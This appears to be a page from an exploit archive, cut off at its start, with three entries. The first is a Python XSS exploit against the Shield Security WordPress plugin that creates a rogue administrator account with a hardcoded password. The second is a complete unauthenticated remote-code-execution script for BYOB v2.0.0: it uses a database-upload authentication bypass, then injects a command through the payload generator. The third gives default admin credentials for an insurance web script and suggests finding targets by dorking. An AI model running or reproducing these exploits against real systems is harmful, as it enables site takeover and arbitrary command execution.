Published: August 7, 2024 # ############################################################################# {reset}""") # Help menu - Provides instructions when '-h' or '--help' is used def print_help(): print(f"""{yellow} Usage: python3 exploit.py <target_url> Example: python3 exploit.py http://example.com Options: -h, --help Show this help message and exit {reset}""") # Format the target URL - Ensures the URL starts with "http://" or "https://" def format_target_url(target_url): if target_url.startswith("http://") or target_url.startswith("https://"): return target_url else: return f"http://{target_url}" # Check if the target is vulnerable by accessing the wp-login.php page def check_vulnerability(target_url): try: response = requests.get(f"{target_url}/wp-login.php") if response.status_code == 200: # Try to extract version information from the response version_info = response.text.split("ver=")[-1].split("\"")[0] version = version_info.split(".") major_version = int(version[0]) minor_version = int(version[1]) patch_version = int(version[2].split('&')[0]) # Check if the version is below 20.0.6 if major_version < 20 or (major_version == 20 and minor_version == 0 and patch_version < 6): print(f"{green}Shield Security version is vulnerable. Let's continue.{reset}") return True else: print(f"{yellow}Version not vulnerable.{reset}") return False else: print(f"{red}Failed to retrieve the version information.{reset}") return False except Exception as e: print(f"{red}Error occurred while checking vulnerability: {e}{reset}") return False # Generate the XSS payload URL that exploits the vulnerability def generate_xss_payload(target_url, username, email, first_name, last_name): # Hardcoded password for the new admin account to be created hardcoded_password = "HaxorStrongAFPassword123!!" # The payload template for the XSS attack payload_template = ( "var xhrNonce = new XMLHttpRequest(); " "xhrNonce.open('GET', '/wp-admin/user-new.php', true); " "xhrNonce.onload = function() {{ " "if (xhrNonce.status === 200) {{ " "var nonce = xhrNonce.responseText.match(/name=\"_wpnonce_create-user\" value=\"([a-zA-Z0-9]+)\"/)[1]; " "var xhr = new XMLHttpRequest(); " "xhr.open('POST', '/wp-admin/user-new.php', true); " "xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); " "xhr.setRequestHeader('Referer', '{target}/wp-admin/user-new.php'); " "xhr.setRequestHeader('Origin', '{target}'); " "var params = 'action=createuser&_wpnonce_create-user=' + nonce + " "'&_wp_http_referer=%2Fwp-admin%2Fuser-new.php" "&user_login={username}&email={email}" "&first_name={first_name}&last_name={last_name}&url=test" "&pass1={password}&pass2={password}&role=administrator" "&createuser=Add+New+User'; " "xhr.send(params); " "xhr.onload = function() {{ " "if (xhr.status == 200) {{ " "console.log('Admin user created successfully'); " "window.location.href = '{target}/wp-admin/admin.php?page=icwp-wpsf-plugin&nav=dashboard&nav_sub=overview'; " "}} else {{ console.log('Error occurred: ' + xhr.statusText); }} " "}}; " "}} else {{ console.log('Error fetching nonce: ' + xhrNonce.statusText); }} }}; " "xhrNonce.send();" ) # Formatting the payload with the provided details payload = payload_template.format( target=target_url, username=username, email=urllib.parse.quote(email), first_name=first_name, last_name=last_name, password=urllib.parse.quote(hardcoded_password) ) # URL encode the payload and generate the full URL for the XSS attack encoded_payload = urllib.parse.quote(f"<script>{payload}</script>") full_url = f"{target_url}/wp-admin/admin.php?page=icwp-wpsf-plugin&nav=dashboard&nav_sub={encoded_payload}" return full_url if __name__ == "__main__": try: # Print the banner print_banner() # Check for help menu flag and print help if necessary if len(sys.argv) != 2 or sys.argv[1] in ['-h', '--help']: print_help() sys.exit(0) # Get the target URL from the command-line argument raw_target_url = sys.argv[1] target_url = format_target_url(raw_target_url) # Check if the target is vulnerable if not check_vulnerability(target_url): sys.exit(1) # Get user input for the new admin account details username = input(f"{blue}Enter username: {reset}") email = input(f"{blue}Enter email: {reset}") first_name = input(f"{blue}Enter first name: {reset}") last_name = input(f"{blue}Enter last name: {reset}") # Display the hardcoded password hardcoded_password = "HaxorStrongAFPassword123!!" print(f"\n{yellow}Using hardcoded password: {hardcoded_password}{reset}") # Generate and display the XSS payload URL xss_payload_url = generate_xss_payload(target_url, username, email, first_name, last_name) print(f"\n{green}Generated XSS Payload URL: {xss_payload_url}{reset}") # Handle keyboard interruption except KeyboardInterrupt: print(f"\n{red}Script interrupted by user.{reset}") sys.exit(1) # Catch any other exceptions and display an error message except Exception as e: print(f"{red}An error occurred: {e}{reset}") sys.exit(1) </code></pre>

<pre><code># Exploit Title: BYOB (Build Your Own Botnet) v2.0.0 Unauthenticated RCE (Remote Code Execution) # Date: 2024-08-14 # Exploit Author: @_chebuya # Software Link: https://github.com/malwaredllc/byob # Version: v2.0.0 # Tested on: Ubuntu 22.04 LTS, Python 3.10.12, change numpy==1.17.3->numpy # CVE: CVE-2024-?????, CVE-2024-????? # Description: This exploit works by spoofing an agent callback to overwrite the sqlite database and bypass authentication, then exploiting an authenticated command injection in the payload builder page # Github: # Blog: import sys import json import base64 import string import random import argparse import requests from bs4 import BeautifulSoup def get_csrf(session, url): r = session.get(url) soup = BeautifulSoup(r.text, 'html.parser') csrf_token = soup.find('input', {'name': 'csrf_token'})['value'] return csrf_token def upload_database(session, url, filename): with open('database.db', 'rb') as f: bindata = f.read() data = base64.b64encode(bindata).decode('ascii') json_data = {'data': data, 'filename': filename, 'type': "txt", 'owner': "admin", "module": "icloud", "session": "lol"} headers = { 'Content-Length': str(len(json.dumps(json_data))) } print("[***] Uploading database") upload_response = session.post(f"{url}/api/file/add", data=json_data, headers=headers) print(upload_response.status_code) return upload_response.status_code def exploit(url, username, password, user_agent, command): s = requests.Session() # This is to ensure reliability, as the application cwd might change depending on the stage of the docker run process filepaths = ["/proc/self/cwd/buildyourownbotnet/database.db", "/proc/self/cwd/../buildyourownbotnet/database.db", "/proc/self/cwd/../../../../buildyourownbotnet/database.db", "/proc/self/cwd/instance/database.db", "/proc/self/cwd/../../../../instance/database.db", "/proc/self/cwd/../instance/database.db"] failed = True for filepath in filepaths: if upload_database(s, url, filepath) != 500: failed = False break if failed: print("[!!!] Failed to upload database, exiting") sys.exit(1) if password is None: password = ''.join([random.choice(string.ascii_uppercase + string.digits) for _ in range(32)]) print(username + ":" + password) register_csrf = get_csrf(s, f'{url}/register') headers = { 'User-Agent': user_agent, 'Content-Type': 'application/x-www-form-urlencoded', } data = { 'csrf_token': register_csrf, 'username': username, 'password': password, 'confirm_password': password, 'submit': 'Sign Up' } print("[***] Registering user ") regsiter_response = s.post(f'{url}/register', headers=headers, data=data) print(regsiter_response.status_code) login_csrf = get_csrf(s, f'{url}/login') data = { 'csrf_token': login_csrf, 'username': username, 'password': password, 'submit': 'Log In' } print("[***] Logging in") login_response = s.post(f'{url}/login', headers=headers, data=data) print(login_response.status_code) headers = { 'User-Agent': user_agent, 'Content-Type': 'application/x-www-form-urlencoded', } data = f'format=exe&operating_system=nix$({command})&architecture=amd64' try: s.post(f'{url}/api/payload/generate', headers=headers, data=data, stream=True, timeout=0.0000000000001) except requests.exceptions.ReadTimeout: pass parser = argparse.ArgumentParser() parser.add_argument("-t", "--target", help="The target URL of the BYOB admin panel", required=True) parser.add_argument("-u", "--username", help="The username to set for the new admin account", default='admin') parser.add_argument("-p", "--password", help="The password to set for the new admin account", default=None) parser.add_argument("-A", "--user-agent", help="The user-agent to use for requests", default='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36') parser.add_argument("-c", "--command", help="The command to execute on the BYOB server", required=True) args = parser.parse_args() exploit(args.target.rstrip("/"), args.username, args.password, args.user_agent, args.command) </code></pre>

<pre><code>==================================================================================================================================== | # Title : Insurance 1.2 Insecure Settings Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) | | # Vendor : https://demo.phpscriptpoint.com/insurance/ | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Insecure Settings : appears to leave a default administrative account in place post installation. [+] use payload : user = admin@gmail.com & pass = 1234 [+] https://www/127.0.0.1/demo/phpscriptpointcom/insurance/admin Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ========================================================================== </code></pre>